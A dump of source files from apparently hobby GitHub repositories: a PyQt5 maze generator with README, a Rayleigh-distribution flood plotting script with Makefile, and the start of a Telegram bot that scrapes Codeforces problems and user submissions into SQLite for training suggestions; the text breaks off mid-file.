"content_id": "f10ba6f184d5c4f9e2fdaee9d38076c9dc7349e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55, "license_type": "no_license", "max_line_length": 55, "num_lines": 1, "path": "/language_list.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "print(\"Language:\\n\\tC\\n\\tC++\\n\\tJava\\n\\tPHP\\n\\tPython\")" }, { "alpha_fraction": 0.6352583765983582, "alphanum_fraction": 0.6352583765983582, "avg_line_length": 35.55555725097656, "blob_id": "36303be9870f7bea88dae7664cc4e9084a6b7c85", "content_id": "fb7b8c81b8c6c59a27bb0297d4eda1ad30ebc9a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/pets.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "def describe_pet(pet_name, animal_type='dog'):\n print(\"\\nI have a \" + animal_type + \".\")\n print(\"My \" + animal_type + \"'s name is \" + pet_name.title() + \".\")\n\n\ndescribe_pet('hamster', 'harry')\ndescribe_pet(animal_type='dog', pet_name='willie')\ndescribe_pet(pet_name='tomas', animal_type='cat')\ndescribe_pet(pet_name='Gav')\n" }, { "alpha_fraction": 0.6555555462837219, "alphanum_fraction": 0.6555555462837219, "avg_line_length": 20.235294342041016, "blob_id": "2df1be9d26738f40ef0f99361d2e08260cbb0e49", "content_id": "f788c0f7480d379ebf9d9efea2b8ab583ea2d04a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/file_reader.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "with open('pi_digits.txt') as file_object:\n content = file_object.read()\n print(content)\n print()\n\nfilename = 'pi_digits.txt'\n\nwith open(filename) as file_object:\n for line in file_object:\n print(line.rstrip())\n print()\n\nwith open(filename) as file_object:\n lines = file_object.readlines()\n\nfor line in lines:\n print(line.rstrip())" }, { "alpha_fraction": 0.7052023410797119, "alphanum_fraction": 0.7052023410797119, "avg_line_length": 27.83333396911621, "blob_id": "d8076f370cd9a3fcd6ae53ac46e8936da308432a", "content_id": "d2bdf65aa1c1c7c7e3792965b340ada245be7558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 346, "license_type": "no_license", "max_line_length": 78, "num_lines": 12, "path": "/favorite_languages.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "from collections import OrderedDict\n\n\nfavorite_language = OrderedDict()\n\nfavorite_language['jen'] = 'python'\nfavorite_language['sarah'] = 'c'\nfavorite_language['edward'] = 'ruby'\nfavorite_language['phil'] = 'python'\n\nfor name, languages in favorite_language.items():\n print(name.title() + \"'s favorite language is \" + languages.title() + \".\")\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 27.5, "blob_id": "fb2c320af279300bcfacbb08db7e54ad608ae1d5", "content_id": "aa30662c0c1c5de7c743b386392c5f2680e94c5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/even_numbers.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "even_numbers = list(range(0, 11, 2))\nprint(even_numbers)" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.7196969985961914, "avg_line_length": 17.85714340209961, "blob_id": "0e348442a6accf9e52be9e51f217e1d37b48ec19", "content_id": "fb72ffe2f4cfb9ee78369b7e5cd1c271c7e72158", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 23, "num_lines": 7, "path": "/dimensions.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "dimensions = (200, 50)\nprint(dimensions[0])\nprint(dimensions[1])\n\ndimensions = (150, 150)\nprint(dimensions[0])\nprint(dimensions[1])\n" } ]
7
ransaked1/MazeMaker
https://github.com/ransaked1/MazeMaker
bb33f7a539f8679677dff3cb431b11061af7b62c
69ffb3fd273e38764f59f1d5d41a14fbec396d4c
625dde4dff604eeff3bf5656009bf78e9226af28
refs/heads/master
2022-05-28T04:42:06.540898
2020-05-02T10:54:26
2020-05-02T10:54:26
260,662,797
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5107104778289795, "alphanum_fraction": 0.5312590599060059, "avg_line_length": 33.97288131713867, "blob_id": "698cd9c438d5de9b08cffebf89639e40ef657cb2", "content_id": "6622c9e357c259b41756b97efaa16ed77521be7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10317, "license_type": "no_license", "max_line_length": 96, "num_lines": 295, "path": "/mazemaker.py", "repo_name": "ransaked1/MazeMaker", "src_encoding": "UTF-8", "text": "import sys\nimport random\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\n#defining values for each direction in the maze\nN,S,E,W = 1,2,4,8\n\n#defining macro to reverse directions\nREVERSE = {E: W, W: E, N: S, S: N}\n\n#GUI object for the app\nclass MazeMakerGUI(QWidget):\n\n def __init__(self):\n super(MazeMakerGUI, self).__init__()\n\n #initializing variables and setting recursion limit\n self.mazeHeight = 0\n self.mazeWidth = 0\n \n sys.setrecursionlimit(35 * 45)\n\n self.maze = list(list(0 for i in range(self.mazeWidth)) for j in range(self.mazeHeight))\n\n #initializing UI\n self.initUI()\n\n #drawing the GUI and maze\n def paintEvent(self, event):\n\n #initializing the painter and fonts\n qp = QPainter()\n qp.begin(gui)\n pen = QPen(Qt.black, 3, Qt.SolidLine)\n qp.setPen(pen)\n qp.setFont(QFont('Decorative', 22))\n \n qp.drawText(868, 86, \"x\")\n\n #drawing the box around the maze output\n qp.drawLine(55, 615, 55, 55)\n qp.drawLine(780, 615, 780, 55)\n qp.drawLine(55, 53, 780, 53)\n qp.drawLine(55, 615, 780, 615)\n\n\n #drawing the maze\n drawWidth = 80\n drawHeight = 70\n #drawing the top line\n for i in range(self.mazeWidth):\n qp.drawLine(drawWidth,drawHeight,drawWidth + 15,drawHeight)\n drawWidth += 15\n #drawing the rest of the maze\n for j in range(self.mazeHeight):\n drawWidth = 80\n drawHeight += 15\n #drawing the left wall of the maze\n if j != 0:\n qp.drawLine(drawWidth, drawHeight, drawWidth, drawHeight - 15)\n for i in range(self.mazeWidth ):\n #leave gap if there is no wall to the south else draw south most wall \n if self.maze[j][i] & S != 0:\n drawWidth += 15\n else:\n qp.drawLine(drawWidth,drawHeight,drawWidth + 15,drawHeight)\n drawWidth += 15\n #don't do anything if at the west most wall\n if self.maze[j][i] & E != 0 and i + 1 < self.mazeWidth:\n if (self.maze[j][i] | self.maze[j][i+1]) & S == 0:\n drawWidth += 0\n #don't draw to the west if at exit\n elif (i == self.mazeWidth-1) & (j == self.mazeHeight-1):\n drawWidth += 15\n #draw wall to the west\n else:\n qp.drawLine(drawWidth, drawHeight, drawWidth, drawHeight - 15)\n\n qp.end()\n \n\n #generating the UI\n def initUI(self):\n\n #initializing app window\n self.setGeometry(30, 30, 980, 670)\n self.setWindowTitle('Maze Maker')\n\n #initializing boxes for maze size input\n self.boxWidth = QLineEdit(self)\n self.boxWidth.move(830, 70)\n self.boxWidth.resize(30,20)\n\n self.boxHeight = QLineEdit(self)\n self.boxHeight.move(890, 70)\n self.boxHeight.resize(30,20)\n\n #initializing button for maze generation\n self.generateButton = QPushButton('Generate maze with RecB', self)\n self.generateButton.move(817,100)\n\n self.generateButton1 = QPushButton('Generate maze with HnK', self)\n self.generateButton1.move(819,130)\n\n self.generateButton.clicked.connect(self.on_click)\n self.generateButton1.clicked.connect(self.on_click1)\n\n #drawing all the UI components\n self.show()\n\n def on_click(self):\n #checking input\n inputWidth = self.boxWidth.text()\n inputHeight = self.boxHeight.text()\n \n try:\n self.mazeWidth = int(inputWidth)\n self.mazeHeight = int(inputHeight)\n except:\n QMessageBox.about(self, 'Error','Maze size input can only be a number')\n return\n pass\n\n if (self.mazeWidth > 45 or self.mazeHeight > 35):\n QMessageBox.about(self, 'Error','Maze size has to be less than 45 x 35')\n return\n\n if (self.mazeWidth < 3 and self.mazeHeight < 3):\n QMessageBox.about(self, 'Error','Maze size has to be more than 2 x 3 or 3 x 2')\n return\n\n #generating bidimensional array for the maze and building it\n self.maze = list(list(0 for i in range(self.mazeWidth)) for j in range(self.mazeHeight))\n self.buildMazeRecBack(0, 0)\n\n #updating the screen\n self.update()\n\n def on_click1(self):\n #checking input\n inputWidth = self.boxWidth.text()\n inputHeight = self.boxHeight.text()\n \n try:\n self.mazeWidth = int(inputWidth)\n self.mazeHeight = int(inputHeight)\n except:\n QMessageBox.about(self, 'Error','Maze size input can only be a number')\n return\n pass\n\n if (self.mazeWidth > 45 or self.mazeHeight > 35):\n QMessageBox.about(self, 'Error','Maze size has to be less than 45 x 35')\n return\n\n if (self.mazeWidth < 3 and self.mazeHeight < 3):\n QMessageBox.about(self, 'Error','Maze size has to be more than 2 x 3 or 3 x 2')\n return\n\n #generating bidimensional array for the maze and building it\n self.maze = list(list(0 for i in range(self.mazeWidth)) for j in range(self.mazeHeight))\n\n #Hunt and kill driver code\n y = 0\n x = 0\n while x != -1:\n started = 1\n while 1:\n try: \n y, x = self.walk(y,x, started)\n started = 0\n except:\n break\n x, y = self.hunt()\n\n #updating the screen\n self.update()\n\n #Recursive backtracking algorithm\n def buildMazeRecBack(self, originX, originY):\n #generate rendom list of all 4 directions\n directions = random.sample([N,S,E,W], 4)\n\n #loop through the list\n for direction in directions:\n #convert direction into maze coordinates\n if direction == S:\n nextX, nextY = originX, originY + 1\n elif direction == N:\n nextX, nextY = originX, originY - 1\n elif direction == E:\n nextX, nextY = originX + 1, originY\n else:\n nextX, nextY = originX - 1, originY\n\n #check if there is a cell to go to and break the wall there\n if nextY in range(self.mazeHeight) and\\\n (nextX in range(self.mazeWidth)) and\\\n self.maze[nextY][nextX] == 0:\n self.maze[originY][originX] |= direction\n self.maze[nextY][nextX] |= REVERSE[direction]\n #do that recursively\n self.buildMazeRecBack(nextX, nextY)\n\n #Walk routine for Hunt and Kill\n def walk(self, originX, originY, started):\n #generate rendom list of all 4 directions\n directions = random.sample([N,S,E,W], 4)\n\n #if first call after a hunt routine connect the maze to a random visited cell nearby\n if started == 1:\n for direction in directions:\n #convert direction into maze coordinates\n if direction == S:\n nextX, nextY = originX, originY + 1\n elif direction == N:\n nextX, nextY = originX, originY - 1\n elif direction == E:\n nextX, nextY = originX + 1, originY\n else:\n nextX, nextY = originX - 1, originY\n\n if nextY in range(self.mazeHeight) and\\\n nextX in range(self.mazeWidth) and self.maze[nextY][nextX] != 0:\n self.maze[originY][originX] |= direction\n self.maze[nextY][nextX] |= REVERSE[direction]\n break\n \n #go to a random unvisited cell and return its coordinates \n for direction in directions:\n #convert direction into maze coordinates\n if direction == S:\n nextX, nextY = originX, originY + 1\n elif direction == N:\n nextX, nextY = originX, originY - 1\n elif direction == E:\n nextX, nextY = originX + 1, originY\n else:\n nextX, nextY = originX - 1, originY\n \n if nextY in range(self.mazeHeight) and\\\n nextX in range(self.mazeWidth) and self.maze[nextY][nextX] == 0:\n self.maze[originY][originX] |= direction\n self.maze[nextY][nextX] |= REVERSE[direction]\n return nextX, nextY\n\n #Hunt routine for Hunt and Kill\n def hunt(self):\n #iterate through the maze and return an unvisited cell\n for i in range(self.mazeHeight):\n for j in range(self.mazeWidth):\n if self.maze[i][j] == 0:\n return i, j\n # return -1, -1 if all cell are visited\n return -1, -1\n\n\n #Utilitarian blocks to print maze values and draw the maze in the terminal\n def printMaze(self):\n for i in range(self.mazeHeight):\n print ('\\n')\n for j in range(self.mazeWidth):\n print(self.maze[i][j], end=' ')\n print('\\n')\n\n def draw(self):\n print(\"_\" * (self.mazeWidth * 2))\n for j in range(self.mazeHeight):\n if j!=0:\n print(\"|\", end='')\n else:\n print (\"_\", end='')\n for i in range(self.mazeWidth):\n if (self.maze[j][i] & S != 0):\n print(\" \", end='')\n else:\n print(\"_\", end='')\n if self.maze[j][i] & E != 0 and i + 1 < self.mazeWidth:\n if ((self.maze[j][i] | self.maze[j][i+1]) & S != 0):\n print(\" \", end='')\n else:\n print(\"_\", end='')\n elif (i==self.mazeWidth-1) & (j==self.mazeHeight-1):\n print(\"_\", end='')\n else:\n print(\"|\", end='')\n print(\"\")\n\n#Create App and GUI Objects and connect to the system\napp = QApplication(sys.argv)\ngui = MazeMakerGUI()\nsys.exit(app.exec_())\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 26.325580596923828, "blob_id": "42121d511849980c473e1fdfb02fb5f9513c6925", "content_id": "334d76dc5dc10e25a355f897b004bb00597bdbc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1175, "license_type": "no_license", "max_line_length": 260, "num_lines": 43, "path": "/README.md", "repo_name": "ransaked1/MazeMaker", "src_encoding": "UTF-8", "text": "# MazeMaker\nSimple maze generator with Recursive Backtracking and Hunt and Kill algorithms in Python using PyQt5\n\n <img src=\"https://github.com/ransaked1/MazeGenerator/blob/master/MazeMaker.png\" width=\"490\" height=\"350\">\n\n## Getting Started\n\n### Prerequisites\n\nMake sure you have python3 installed:\n```\nsudo apt-get install python3\n```\n\nTo install PyQt5 type:\n```\nsudo apt-get install python3-pyqt5\nsudo apt-get install pyqt5-dev-tools\nsudo apt-get install qttools5-dev-tools\n```\n\n## Running the program\nIn root folder run:\n```\npython3 mazemaker.py\n```\n\n### Potential Issues\n* PyQt5 uses the X11 server for display. If you are running the app on a Windows 10 Ubuntu Subsystem, you will need to download and setup Xming in Windows: https://xming.en.softonic.com/. Then export the window path in your Ubuntu environment and run the game:\n```\nexport DISPLAY=:0.0\n```\n* If the game won't open on your Linux or MacOS machine you may be missing the X11 server packages. You can download them by typing:\n```\nsudo apt-get install xorg openbox\n```\nAnd export the windows path:\n```\nexport DISPLAY=:0.0\n```\n\n## Built With\n* [PyQt5](https://pypi.org/project/PyQt5/) - Cross-platform GUI\n" } ]
2
saludes/2010flood
https://github.com/saludes/2010flood
6e3bd5aa7e869fee061023845f7a0baf48843fe9
03ded64517e013c63307836d99e7b22e4bc3394d
bf08e2b8198b0851ce3e482496ac012283edf8a9
refs/heads/master
2016-09-05T23:21:39.019264
2011-09-14T09:38:37
2011-09-14T09:38:37
1,765,342
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.559476375579834, "alphanum_fraction": 0.615822434425354, "avg_line_length": 24.114286422729492, "blob_id": "f3847e3db00a92989eecb237556447d80293ef27", "content_id": "63ed06e1d5933dfdab3b4fd06437e50dfd6d977b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1757, "license_type": "no_license", "max_line_length": 77, "num_lines": 70, "path": "/rayleigh.py", "repo_name": "saludes/2010flood", "src_encoding": "UTF-8", "text": "from numpy import *\nimport sys\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nmode= 'save'\nN = 100\nM = 1000\ns = tm = 10\na = -10\nb = 100\n\n# http://en.wikipedia.org/wiki/Rayleigh_distribution\n# cumulative distribution: 1-exp(-x^2/(2*sigma**2))\nray = lambda t,sigma=1: t>0 and t/sigma**2*exp(-t**2/(2*sigma**2)) or 0.\npray = lambda t,sigma=1: t>0 and 1 - exp(-t**2/2/sigma**2) or 0.\n\n\nts = linspace(a,b,M)\nqs = array([1 + 40*ray(t,tm) for t in ts])\ntqs = array([ts,qs]).transpose()\nqmax = max(qs)\nqmin = min(qs)\ntmax = ts[argmax(qs)]\nprint \"qmax =\",qmax, \" at tmax =\", tmax\ntqs1 = tqs[ts<tmax,:]\ntqs2 = tqs[ts>tmax,:]\n\nassert all(diff(tqs1[:,1])>=0), \"Not increasing\"\nassert all(diff(tqs2[:,1])<=0), \"Not decreasing\"\n\n# Inverse interpolation to find t_{-+}(q)\nundef = NaN\nt1 = lambda q: interp(q, tqs1[:,1], tqs1[:,0],left=undef, right=undef)\nt2 = lambda q: interp(q, tqs2[::-1,1], tqs2[::-1,0], left=undef, right=undef)\n\nys = linspace(0,qmax,N)[:-1]\ndq = ys[1]-ys[0]\ndt = t2(ys)-t1(ys)\n#print dt\n#assert all(dt>=0), \"Negative dt\"\n#assert all(logical_or(isnan(diff(dt)), diff(dt)<=0)), \"Non decreasing dt\"\nvy = cumsum(dq*dt[::-1]) # Start at the top\n\nfg = plt.figure(1)\nax1 = fg.add_subplot(121)\nax2 = fg.add_subplot(122)\nax1.plot(ys[::-1],vy,'b-')\n\nW = 22.\nqf = interp(W,vy,ys[::-1])\nprint \"W = \", W\nprint \"Qf = \", qf\nprint \"t1,t2 = \", t1(qf), t2(qf)\npq = tuple([t + 40*pray(t,tm) for t in (t1(qf),t2(qf))])\nprint \"cumulative difference =\",pq[1] - pq[0], (t2(qf) - t1(qf))*qf + W \nax1.plot([1,qf,qf],[W,W,0],'g:')\nax2.plot(ts,qs,'b-')\nax2.plot([a,b],[qf,qf],'r:')\nfcolor = 'cyan'\nax2.fill_between(ts,qs,qf,where=qs>qf,facecolor=fcolor,color=fcolor)\nax2.axis([a,b,0,5])\n\n\n\nif mode == 'save':\n\tfg.savefig('cut.pdf')\nelse:\n\tplt.show()" }, { "alpha_fraction": 0.6861313581466675, "alphanum_fraction": 0.7007299065589905, "avg_line_length": 16.1875, "blob_id": "1aaabb32e120549e9c25deab0c66dde49e316076", "content_id": "3cf6d339b65f254efe7e17872f7e37d71ae05638", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 274, "license_type": "no_license", "max_line_length": 84, "num_lines": 16, "path": "/README.md", "repo_name": "saludes/2010flood", "src_encoding": "UTF-8", "text": "## How to view it\n\nGo to file `flood.pdf` and click _View Raw_.\n\n## How to make it\n\n> latex flood\n\n## File organization\n\n`flood.tex` is the main LaTeX file but the bulk of the paper is inside `answer.tex`.\n\n\n## To do\n\nVisit the Wiki https://github.com/saludes/2010flood/wiki" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.6988636255264282, "avg_line_length": 12.538461685180664, "blob_id": "18cec95aa26582d3969b7ff835f9354903646d94", "content_id": "6b23a68cc71780cb151c8c5dc44b057dfd9e3441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 176, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, "path": "/Makefile", "repo_name": "saludes/2010flood", "src_encoding": "UTF-8", "text": "IMAGES = cut.pdf\nflood.pdf: flood.tex answer.tex ${IMAGES}\n\tpdflatex flood\n\ncut.pdf: rayleigh.py\n\tpython2.6 $^\n\nclean:\n\trm -f cut.pdf \n\ndistclean:\n\tmake clean\n\trm -f flood.pdf\n" } ]
3
lissrbay/codeforces_bot
https://github.com/lissrbay/codeforces_bot
925adf28c70d06c7597e77990d37e821028a6cb5
cc00da63d4c6e2ae9b5554224cd111a1d5dc37b4
b5733e309a1b4cfc5a683ef9ed4aced2f716ba66
refs/heads/master
2021-09-02T13:40:42.429158
2018-01-03T00:26:46
2018-01-03T00:26:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5163999199867249, "alphanum_fraction": 0.529710054397583, "avg_line_length": 39.20382308959961, "blob_id": "6e81290ca74a3906ab92fa8f134c5c1c9f13d232", "content_id": "ca9a26b0d98331709f578e9e3b1db6cdf8f1e53a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6311, "license_type": "no_license", "max_line_length": 123, "num_lines": 157, "path": "/bases/update.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "import requests\nimport sqlite3\nimport os\nfrom bs4 import BeautifulSoup\n\ndef cf_update():\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n cursor = settings.cursor()\n cursor.execute(\"select * from last_update_problemset\")\n x = cursor.fetchone()\n\n last_try = x[0]\n\n url = 'http://codeforces.com/problemset/'\n r = requests.get(url)\n max_page = 0\n available_tags = {'math', \"strings\", \"trees\", \"graphs\", \"dp\", \"greedy\"}\n soup = BeautifulSoup(r.text, \"lxml\")\n base = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\cf.db\")\n conn = base.cursor()\n\n for link in soup.find_all(attrs={\"class\" : \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[3]))\n\n a = ''\n b = 0\n f = False\n last_update = last_try\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/problemset/' + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n old = ''\n v = False\n for link in soup.find_all('a'):\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5 and old != s[3] + s[4]:\n if s[3] + s[4] == last_try:\n v = True\n break\n a = s[3]\n b = s[4]\n old = s[3] + s[4]\n if not f:\n f = True\n last_update = old\n conn.execute(\"insert into problems values (?, ?)\", (a, b))\n if len(s) == 4 and s[3] in available_tags:\n conn.execute(\"insert into ? values (?, ?)\", (s[3], a, b))\n\n if v:\n break\n\n\n base.commit()\n base.close()\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"update last_update_problemset set problem = ? where problem = ?\", (str(last_update), str(last_try)))\n settings.commit()\n settings.close()\n\ndef update_user(username, chat_id, last_update):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor_settings = settings.cursor()\n cursor_settings.execute(\"select last_problem from users where chat_id = ?\", (str(chat_id), ))\n update_eq = cursor_settings.fetchone()\n cursor_settings.execute(\"select * from last_update_problemset\")\n update_base = cursor_settings.fetchone()\n last_problem = update_base[0]\n if update_eq[0] != update_base[0]:\n cursor2.execute(\"SELECT * FROM problems\")\n x = cursor2.fetchone()\n while x != None:\n cursor.execute(\"select * from result where problem = ? and diff = ?\", (str(x[0]), str(x[1])))\n x2 = cursor.fetchone()\n if x2 == None:\n cursor.execute(\"insert into result values (?, ?, ? )\", (x[0], x[1], \"NULL\"))\n last_problem = x\n x = cursor2.fetchone()\n conn2.close()\n settings.close()\n if len(last_problem) == 2:\n last_problem = last_problem[0] + last_problem[1]\n\n url = 'http://codeforces.com/submissions/' + username\n r = requests.get(url)\n max_page = 1\n soup = BeautifulSoup(r.text, \"lxml\")\n\n for link in soup.find_all(attrs={\"class\": \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[4]))\n\n v = False\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/0')\n soup = BeautifulSoup(r.text, \"lxml\")\n last_try_new = soup.find(attrs={\"class\": \"status-small\"})\n last_try_new = str(last_try_new).split()\n last_try_new = str(last_try_new[2]) + str(last_try_new[3])\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n count = 0\n j = 0\n ver = soup.find_all(attrs={\"class\": \"submissionVerdictWrapper\"})\n last_try = soup.find_all(attrs={\"class\": \"status-small\"})\n for link in soup.find_all('a'):\n last_try_date = str(last_try[j]).split()\n last_try_date = str(last_try_date[2]) + str(last_try_date[3])\n if last_try_date == last_update:\n v = True\n break\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5:\n s2 = str(ver[count]).split()\n s2 = s2[5].split('\\\"')\n count += 1\n j += 1\n cursor.execute(\"select * from result where problem = ? and diff = ?\", (s[3], s[4]))\n x = cursor.fetchone()\n if s2[1] == 'OK' and x != None:\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n if x[2] != 'OK':\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n if v:\n break\n\n conn.commit()\n conn.close()\n\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"update users set username = ? where chat_id = ?\", (str(username), str(chat_id)))\n conn.execute(\"update users set last_update = ? where chat_id = ?\", (str(last_try_new), str(chat_id)))\n conn.execute(\"update users set last_problem = ? where chat_id = ?\", (str(last_problem), str(chat_id)))\n\n settings.commit()\n settings.close()\n\n\ndef update_theory_base(tag, link):\n theory = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\theory.db\")\n conn = theory.cursor()\n conn.execute(\"insert into ? values (?)\", (tag, str(link)))\n theory.commit()\n theory.close()" }, { "alpha_fraction": 0.6580531597137451, "alphanum_fraction": 0.6626046299934387, "avg_line_length": 39.30769348144531, "blob_id": "dc74ac352d2375bab83aec668428e8f2f2a7f13b", "content_id": "175a69c035a975a17e24c643632110ae8d30d59b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6811, "license_type": "no_license", "max_line_length": 175, "num_lines": 169, "path": "/bot.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n#CFTrainingBot\nimport config\nimport telebot\nimport bases.createuserbase\nimport bases.createcfbase\nimport bases.problem\nimport sqlite3\nimport os\nimport bases.update\n\nbot = telebot.TeleBot(config.token)\n\n\ndef get_current_state(chat_id):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__))+\"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(chat_id),))\n name = conn.fetchone()\n if name != None:\n return name[4]\n else:\n return False\n settings.close()\n\ndef set_state(chat_id, value):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"update users set state = ? where chat_id = ?\", (str(value), str(chat_id)))\n settings.commit()\n settings.close()\n\[email protected]_handler(commands = ['help'])\ndef show_help(message):\n s = ''\n s += \"/login - to authorization.\\n\"\n s += \"/task - to get random unsolved task.\\n\"\n s += \"/theory - to get theory for chosen tag.\\n\"\n s += \"/stats - to see your statistic.\"\n bot.send_message(message.chat.id, \"Type:\\n\" + s)\n\n\[email protected]_handler(commands=['start'])\ndef sayhellotoeveryone(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n bot.send_message(message.chat.id, \"Hello!\")\n bot.send_message(message.chat.id, \"Type /help to see list of commands.\")\n conn.execute(\"insert into users values (?, ?, ?, ?, ?)\", (str(message.chat.id), \"None\", \"NULL\", \"0\", config.States.S_START.value))\n settings.commit()\n settings.close()\n\n\n#Not available for users\[email protected]_handler(commands=['add'])\ndef add_theory(message):\n bot.send_message(message.chat.id, \"Gimme tag and link\")\n set_state(message.chat.id, config.States.S_THEORY_ADDING.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_THEORY_ADDING.value)\ndef add_theory2(message):\n s = message.text.split()\n bases.update.update_theory_base(s[0], s[1])\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands=['theory'])\ndef get_theory(message):\n bot.send_message(message.chat.id, \"Print tag for theory.\\nList of tags:\\n - math \\n - dp \\n - greedy \\n - strings \\n - trees \\n - graphs \\n - geometry \\n - combinatorics\")\n set_state(message.chat.id, config.States.S_THEORY.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_THEORY.value)\ndef get_theory2(message):\n bot.send_message(message.chat.id, str(bases.problem.get_theory_from_tag(message.text)))\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands =['login'])\ndef get_login(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n if name != None:\n bot.send_message(message.chat.id, \"Previous handle: \" + str(name[1]))\n else:\n bot.send_message(message.chat.id, \"Previous handle: None\")\n settings.close()\n bot.send_message(message.chat.id, \"Type new handle: \")\n set_state(message.chat.id, config.States.S_LOGIN.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_LOGIN.value)\ndef get_login2(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n if bases.createuserbase.check_username(message.text):\n bot.send_message(message.chat.id, \"Invalid handle.\")\n set_state(message.chat.id, config.States.S_START.value)\n return 0\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n settings.close()\n bases.update.cf_update()\n bases.createuserbase.clean_base(name[1])\n bases.createuserbase.clean_base(message.text)\n bot.send_message(message.chat.id, \"Creating base...\")\n bases.createuserbase.init_user(message.text, message.chat.id)\n bot.send_message(message.chat.id, \"Done!\")\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands=['task'])\ndef task(message):\n s = \"Which kind of task you need?\\n\"\n s += \"List of tags:\\n - math \\n - dp \\n - greedy \\n - strings\"\n s += \"\\n - trees \\n - graphs \\n - geometry \\n - combinatorics\"\n s 